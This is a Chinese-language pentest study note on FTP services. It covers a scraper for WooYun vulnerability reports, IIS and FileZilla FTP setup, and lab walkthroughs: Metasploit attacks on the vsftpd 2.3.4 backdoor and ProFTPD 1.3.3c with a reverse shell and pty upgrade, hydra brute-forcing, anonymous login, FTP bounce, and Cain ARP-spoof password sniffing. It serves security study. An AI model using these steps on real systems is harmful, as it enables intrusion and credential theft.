端口与服务-ftp服务
端口与服务-ftp服务
1概述
1.1.从先知和乌云上爬取端口历史漏洞报告,总结报告
1.2.全面总结,出具一个表格之类的汇总表
2.ftp
# -*- coding: utf-8 -*-
import requests,re,sys
def wooyun_chax(keywords,page):
url =
"https://wooyun.x10sec.org/search?keywords="+keywords+"&&content_search_by=by_bugs&&search_by_html=False&&page="+page
print(url)
req = requests.get(url)
text = req.text
r = re.findall('<td><a
href="(.*?)" target="_blank">\s(.*?)</a>',text)
for i in r:
print("漏洞名称:"+i[1])
print("漏洞链接:"+"https://wooyun.x10sec.org/"+i[0])
print("漏洞总结:")
wooyun_chax(sys.argv[1],sys.argv[2])
2.1 ftp搭建
iis搭建
1.安装ftp服务:控制面板-程序和功能-打开或关闭windows功能-internet信息服务-ftp服务
2.查询ftp服务:计算机-管理-iis
3.创建一个ftp站点:右键-添加ftp站点-填写站点名称/目录-端口和IP-权限设置
4.启动
FileZillaServer搭建
1.安装:FileZillaServer-百度搜索下载-安装,打开
2.设置:打开-设置端口-edit-users-shared folders设置目录-添加用户-general设置密码
3.查看日志:edit-settings
2.2典型案列
1.后门vsftpd https://www.freebuf.com/column/143480.html
总结
1.搜索:钟馗之眼搜索 product:vsftpd 2.3.4
2.nmap漏洞探测:nmap --script=vuln且提示anonymous可以匿名登录
3.msf攻击
1.use exploit/unix/ftp/vsftpd_234_backdoor
2.set rhost和rport
3.exploit攻击
4.创建用户,提权
2.ftp远程代码溢出 https://blog.csdn.net/weixin_42214273/article/details/82892282
总结
1.环境:靶机 192.168.88.165 攻击机 192.168.88.138
2.扫描:nmap -sV 192.168.88.165 扫描服务和版本
nmap -A -v 192.168.88.165 扫描全部信息 不好用
nmap -O 192.168.88.165 探测靶场的操作系统类型与版本
3.发现开启的服务:ftp proftpd 1.3.3c
4.在kali中搜索漏洞:searchsploit ProFTPD 1.3.3c 未找到
5.msf中搜索相应漏洞模块:search ProFTPD 1.3.3c
配置1.设置payload set payload cmd/unix/reverse
2.设置lhost和rhost
3.exploit攻击
4.id查看
5.端口优化:python –c “import pty;pty.spawn(‘/bin/bash’)”
6.获取flag:一般flag放在root下 cd /root
3.ftp跳转攻击。 https://blog.csdn.net/mgxcool/article/details/48249473
2.3 攻击方式
ftp://192.168.43.85 1.正常输入uname和paw登陆,显示乱码。解决:控制面板-区域和语言-当前系统区域设置-设置为中文(简体,中国)
2.匿名访问 用户名:anonymous 密码:为空或者任意邮箱
3.直接访问
4.暴力猜解 hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt
5.后门vsftpd
6.ftp远程代码溢出
7.跳转攻击
8.嗅探 cain嗅探ftp密码
2.4 cain嗅探ftp密码
1.设置 网卡设置cain-configure-sniffer-选择用于嗅探的网卡
arp中可以设置伪造的ip和mac地址
端口设置filters and ports-设置嗅探的端口
2.操作 找到被欺骗的IP:点击sniffer-scan mac address-打开arp页面-选择被欺骗的IP
点击嗅探
结果:passwords处显示抓取的密码